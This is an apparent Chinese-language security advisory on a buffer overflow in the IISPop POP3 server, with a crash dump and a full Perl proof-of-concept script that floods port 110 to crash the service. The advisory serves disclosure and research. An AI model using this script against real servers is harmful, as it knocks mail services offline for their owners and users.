IISPop远程缓冲区溢出拒绝服务攻击漏洞
发布日期:2002-11-14
更新日期:2002-11-19
受影响系统:Curtis Specialty Consulting IISPop 1.181
Curtis Specialty Consulting IISPop 1.161
描述:
BUGTRAQ ID:
6183
IISPop是一款适合小型网络的POP3服务程序,可运行在Windows 2000/IIS 5系统上。
IISPop POP3服务程序对超长请求处理不正确,远程攻击者可以利用这个漏洞进行缓冲区溢出,可导致拒绝服务,也存在以POP3服务进程权限在系统上执行任意指令的可能。
攻击者向IISPop POP3服务程序提交超过289999字节的数据,可导致发生访问冲突,错误对话框类似如下:
Access violation - code c0000005 (first chance)
eax=00000041 ebx=00407d3d ecx=00000101 edx=000021ae
esi=0040693d edi=00437181
eip=77e76941 esp=0112ffb0 ebp=0000026c iopl=0 nv up
ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038
gs=0000 efl=00000206
KERNEL32!GetCurrentThreadId+4:
77e76941 0000 add [eax],al
ds:0023:00000041=??
(unhandled exeption in IISPop.exe (KRNELL32.DLL)
0xc0000005 : access violation
精心提交请求的数据可能以POP3服务进程权限在系统上执行任意指令。
<*来源:securma massine (
securma@caramail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103729432602720&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
securma massine (
securma@caramail.com)提供了如下测试方法:
#!/usr/bin/perl -w
# tool : iispdos.pl
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
#
use IO::Socket;
$ARGC=@ARGV;
if ($ARGC !=1) {
print "\n-->";
print "\tUsage: perl iispdos.pl <host> \n";
exit;
}
$remo = $ARGV[0];
$buffer = "A" x 289999;
print "\n-->";
print "\tconnection with $remo\n";
unless ($so = IO::Socket::INET->new (Proto => "TCP",
PeerAddr => $remo,
PeerPort
=> "110"))
{
print "-->";
print "\tConnection Failed...\n";
exit;
}
print $so "$buffer\n";
close $so;
print "-->";
print "\tnow test if the distant host is down\n";
exit;
建议:
厂商补丁:
Curtis Specialty Consulting
---------------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.curtiscomp.com/iispop/浏览次数:3974
严重程度:0(网友投票)